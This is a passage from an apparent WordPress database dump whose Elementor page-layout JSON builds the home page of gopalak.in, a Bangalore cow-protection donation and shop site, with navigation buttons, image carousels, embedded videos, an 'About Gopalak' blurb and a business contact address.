-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11427,1900,'_elementor_page_assets','a:0:{}'),(11429,1901,'_elementor_edit_mode','builder'),(11430,1901,'_elementor_template_type','wp-page'),(11431,1901,'_elementor_version','3.7.8'),(11432,1901,'_wp_page_template','elementor_canvas'),(11433,1901,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed 